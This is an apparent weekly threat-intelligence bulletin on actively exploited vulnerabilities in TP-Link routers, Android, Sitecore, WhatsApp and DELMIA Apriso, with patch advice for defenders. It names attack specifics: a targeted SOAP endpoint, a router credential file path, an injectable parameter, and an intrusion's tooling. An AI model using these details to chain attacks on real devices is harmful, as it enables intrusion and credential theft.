A dynamic mix of vulnerabilities shaped this week’s cyber landscape as flaws in networking gear, messaging platforms, Android devices, and enterprise software came under active exploitation. CISA expanded its KEV catalog with seven high-risk entries, including three tied to TP-Link devices, two Android zero-days under limited, targeted exploitation patched by Google, one affecting Meta-owned WhatsApp, and one impacting Sitecore Experience Manager (XM) and Experience Platform (XP). Industrial software was also in focus, with confirmed exploit attempts against DELMIA Apriso, underscoring how attackers continue to probe both consumer and enterprise ecosystems alike.

Botnet activity is on the rise, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications. At the same time, IoT-focused botnets like Mirai, Bashlite, Tsunami, and BrickerBot have intensified attacks on EirD1000 routers, aiming to establish persistence and enable lateral movement.  

Recent threat research has uncovered sophisticated exploitation campaigns showcasing the evolving tactics of advanced threat actors. Sekoia reported that TP-Link vulnerabilities were exploited through a chained attack by the Quad 7 botnet (CovertNetwork-1658), linked to Storm-0940. Separately, Mandiant uncovered a ViewState deserialization attack on Sitecore instances using exposed machine keys, leading to remote code execution. The intrusion revealed WEEPSTEEL malware for reconnaissance and the use of tools like EARTHWORM, DWAgent, and SharpHound to enable persistence, tunneling, and Active Directory mapping.

Together, these developments highlight how attackers continue to exploit weaknesses across networking hardware, mobile ecosystems, and critical business applications.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-5086
A Deserialization of Untrusted Data Vulnerability has been identified in the DELMIA Apriso, affecting releases from 2020 through 2025 and carrying a critical CVSS score of 9.0. Dassault Systèmes issued an advisory in June 2025, warning that the flaw could enable remote code execution in Apriso’s Manufacturing Operation Management (MOM) and Manufacturing Execution System (MES) platforms, which form the backbone of many industrial environments. Recently, researchers at SANS.edu have observed active exploitation attempts traced to IP 156.244.33(.)162. The attacks use SOAP POST requests targeting /apriso/WebServices/FlexNetOperationsService.svc/Invoke, embedding malicious objects in XML that decode into Windows executables. Organizations are urged to apply patches immediately, monitor for suspicious SOAP traffic and Base64 payloads, and restrict internet exposure of MOM/MES systems to mitigate ongoing exploitation.  

CVE-2025-9377
An OS Command Injection vulnerability has been identified in the TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 routers, specifically within the Parental Control page. The flaw affects firmware versions released before 241108, allowing attackers to potentially inject and execute malicious commands. While TP-Link issued patched firmware for these models, both devices have since reached end-of-life (EoL), meaning they will no longer receive long-term support or security updates beyond the available fix. Users are therefore strongly encouraged to migrate to newer hardware that ensures ongoing protection and performance. For those unable to upgrade immediately, TP-Link recommends applying the patched firmware, restoring the router, and disabling remote management in favor of the official Tether app. The flaw has also been added to the CISA’s Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation risk.

CVE-2025-38352
A TOCTOU (Time-of-Check Time-of-Use) Race Condition Vulnerability has been discovered in the Linux Kernel's POSIX CPU timers subsystem. This issue occurs when a non-autoreaping task, during its exit process, triggers a race between handle_posix_cpu_timers() and posix_cpu_timer_del(), potentially leading to missed timer detections, unstable task cleanup, and overall system instability. Google addressed the issue in its Android security updates by introducing exit_state validation to mitigate the flaw. Actively exploited as a zero-day in limited, targeted attacks, this kernel-level vulnerability has also been added to CISA  KEV catalog, underscoring its severity and ongoing risk.

CVE-2025-48543
A Privilege Escalation Vulnerability affecting the Android Runtime (ART) has been acknowledged by Google as a zero-day flaw under limited, targeted exploitation. The bug allows local privilege escalation without requiring any user interaction, making it a serious concern for Android users. While technical specifics remain undisclosed, Google has released a patch in its September 2025 Android Security Bulletin. The vulnerability has also been added to CISA KEV catalog, emphasizing the urgency for users to apply the patch promptly to mitigate active threats.

CVE-2025-53690
A Deserialization of Untrusted Data vulnerability has been discovered in Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud, with a critical CVSS score of 9.0, allowing attackers to potentially execute remote code on affected systems. The issue traces back to the older deployment guides that included publicly exposed ASP.NET Machine keys, which attackers have exploited to launch ViewState deserialization attacks capable of injecting malicious code and gaining unauthorized access. A joint disclosure by Mandiant and Sitecore confirmed active exploitation of this issue, and it has since been added to CISA KEV catalog. Sitecore has advised organizations to review their environments, secure exposed machine keys, and follow mitigation guidance from Microsoft Threat Intelligence, Mandiant, and Sitecore.

CVE-2025-55177 An Incorrect Authorization vulnerability in WhatsApp has been identified, allowing an unrelated user to force a target’s device into processing content from a malicious URL. The flaw impacted WhatsApp for iOS (prior to v2.25.21.73), WhatsApp Business for iOS (v2.25.21.78), and WhatsApp for Mac (v2.25.21.78) before being patched by the company, which has also begun issuing security notifications to individuals believed to have been targeted over the past three months. Although serious on its own, the risk was amplified when combined with Apple’s CVE-2025-43300, an out-of-bounds write vulnerability in the Image I/O framework affecting iOS, iPadOS, and macOS. This exploit chain enabled a sophisticated “zero-click” attack, requiring no user interaction, that has reportedly impacted both iPhone and Android users, including journalists and human rights defenders, highlighting the persistent risks posed by government spyware. The flaw has since been added to CISA KEV catalog.

CVE-2023-50224
An Authentication Bypass by Spoofing Vulnerability has been identified in the TP-Link TL-WR841N router, specifically within the httpd service that listens on TCP port 80. The flaw enables network-adjacent attackers to access sensitive information, including stored credentials, without authentication. Once compromised, these credentials can provide attackers with a pathway to further infiltrate the device and connected systems. As the affected products have already reached end-of-life (EoL) and will not receive security updates, users are strongly advised to replace them with supported hardware. This vulnerability has also been added to the CISA KEV catalog recently, underscoring its exploitation risk.

CVE-2020-24363
A Missing Authentication for Critical Function Vulnerability has been disclosed in the TP-Link TL-WA855RE Wi-Fi Range Extender (V5 20200415-rel37464), carrying a CVSS score of 8.8 (High). The flaw allows attackers to bypass the standard login requirement of the web interface by exploiting exposed APIs, enabling them to set a new administrative password and gain full control of the device. While a patch was previously noted in 2021, TP-Link has since confirmed that the device has reached end-of-life (EoL), meaning no further updates or support will be provided. As a result, users are strongly urged to replace affected hardware with newer, supported models to mitigate the risk. Although over five years old, this vulnerability has only recently been added to the CISA KEV catalog, highlighting its continued exploitation risk.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-53690
Mandiant Threat Defense discovered an active ViewState deserialization attack targeting Sitecore deployments that relied on sample machine keys exposed in legacy Sitecore deployment guides from 2017 and earlier. The vulnerability, tracked as CVE-2025-53690, was exploited on an internet-facing Sitecore instance, allowing remote code execution. A decrypted payload revealed WEEPSTEEL, a custom malware used for internal reconnaissance, followed by the attacker archiving sensitive files such as web.config and conducting host and network mapping. Tooling was staged in a public directory, including EARTHWORM, an open-source tunneling utility to maintain covert communication, DWAgent, an open-source remote access tool enabling persistent control and Active Directory reconnaissance, and SharpHound, an open-source framework for mapping Active Directory relationships to support privilege escalation.  

The attacker also created local administrator accounts and attempted to dump SAM/SYSTEM hives to obtain cached credentials, ultimately using them for lateral movement over RDP. Although Mandiant disrupted the operation before its full lifecycle could be observed, the adversary’s deep understanding of Sitecore and the exploited vulnerability was evident throughout their progression from initial compromise to privilege escalation.

Quad 7 Botnet Targets TP-Link Routers
According to Sekoia.io, a TP-Link WR841N router (firmware 3.16.9 Build 150320 Rel.57500n) was observed being exploited through a chained attack attributed to the Quad 7 botnet (aka CovertNetwork-1658), operated by the China-linked threat actor Storm-0940. The attackers first leveraged an unauthenticated file disclosure vulnerability, CVE-2023-50224, tracked internally by TP-Link as TPVD 202321023 TL-WR841N, to extract credentials stored in /tmp/dropbear/dropbearpwd and replay them in HTTP Basic authentication. Once authenticated, they proceeded to exploit a command injection flaw in the Parental Control page; CVE-2025-9377 by tampering with the url_0 parameter, ultimately achieving remote code execution. This chained exploitation highlights how threat actors combine multiple flaws to bypass security layers and conduct stealthy, high-impact attacks.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog
2. https://www.cisa.gov/news-events/alerts/2025/09/02/cisa-adds-two-known-exploited-vulnerabilities-catalog
3. https://www.cisa.gov/news-events/alerts/2025/09/04/cisa-adds-three-known-exploited-vulnerabilities-catalog  
4. https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserialization-zero-day-vulnerability  
5. https://isc.sans.edu/diary/32256  
6. https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003865  
7. https://source.android.com/docs/security/bulletin/2025-09-01  
8. https://www.whatsapp.com/security/advisories/2025?
9. https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/#h-are-all-of-these-compromised-tp-links
10. https://securityonline.info/cve-2025-5086-cvss-9-0-a-critical-rce-in-delmia-apriso-with-exploit-attempts-seen-in-the-wild/